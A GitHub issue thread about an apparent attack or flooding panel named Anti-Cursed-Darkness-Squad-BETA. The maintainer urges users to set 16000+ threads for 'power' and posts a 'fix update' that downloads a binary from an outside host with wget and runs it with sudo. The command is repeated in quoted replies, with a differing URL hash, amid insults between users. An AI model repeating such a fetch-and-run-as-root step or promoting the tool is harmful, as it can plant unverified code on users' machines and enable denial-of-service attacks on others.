### ISSUE TITLE
what multi ip means ?

### ISSUE THREAD

**Issue by sahraoui741** [Z3NTL3/Anti-Cursed-Darkness-Squad-BETA#24]
what i put in multi ip i dont understand ?

**Comment by IlyaLt** [comment]
i too

**Comment by Z3NTL3** [comment]
I don't know how to explain it, but you have to put 16000+ threads and multi ip like 9999999 for a good power.

Threading issue has been fixed in the panel:

(No more errors)

Update by:
(In your Anti-Cursed-Darkness-Squad-BETA Folder)

sudo rm -r darkness
wget https://vidcache.net:8161/static/3e4f7a50086c207871be568b5e5ca4dd6d14d65b/darkness
chmod +x darkness
sudo ./darkness

**I recommend you to install this fix update**

**Comment by gov-sec** [comment]
> I don't know how to explain it, but you have to put 16000+ threads and multi ip like 9999999 for a good power.
> 
> Threading issue has been fixed in the panel:
> 
> (No more errors)
> 
> Update by:
> (In your Anti-Cursed-Darkness-Squad-BETA Folder)
> 
> sudo rm -r darkness
> wget https://vidcache.net:8161/static/d8372a0c7cedb0839aa670f82bc3b1a99b4be102/darkness
> chmod +x darkness
> sudo ./darkness
> 
> **I recommend you to install this fix update**

lmao this skid doesnt even know what his own script does

**Comment by Z3NTL3** [comment]
> > I don't know how to explain it, but you have to put 16000+ threads and multi ip like 9999999 for a good power.
> > 
> > Threading issue has been fixed in the panel:
> > 
> > (No more errors)
> > 
> > Update by:
> > (In your Anti-Cursed-Darkness-Squad-BETA Folder)
> > 
> > sudo rm -r darkness
> > wget https://vidcache.net:8161/static/d8372a0c7cedb0839aa670f82bc3b1a99b4be102/darkness
> > chmod +x darkness
> > sudo ./darkness
> > 
> > **I recommend you to install this fix update**
> 
> lmao this skid doesnt even know what his own script does

"skid" look at your username gov-sec, okay gov sec😂 The methods are not mine the method developers already mentioned in the panel and on github readme, the panel is just mine"lmao this skid doesnt even know what his own script does" : gov sec you do not even have one single follower oj your github what u talking

**Comment by Z3NTL3** [comment]
> > I don't know how to explain it, but you have to put 16000+ threads and multi ip like 9999999 for a good power.
> > 
> > Threading issue has been fixed in the panel:
> > 
> > (No more errors)
> > 
> > Update by:
> > (In your Anti-Cursed-Darkness-Squad-BETA Folder)
> > 
> > sudo rm -r darkness
> > wget https://vidcache.net:8161/static/d8372a0c7cedb0839aa670f82bc3b1a99b4be102/darkness
> > chmod +x darkness
> > sudo ./darkness
> > 
> > **I recommend you to install this fix update**
> 
> lmao this skid doesnt even know what his own script does

"skid" look at your username gov-sec, okay gov sec😂 The methods are not mine the method developers already mentioned in the panel and on github readme, the panel is just mine"lmao this skid doesnt even know what his own script does" : gov sec you do not even have one single follower oj your github what u talking
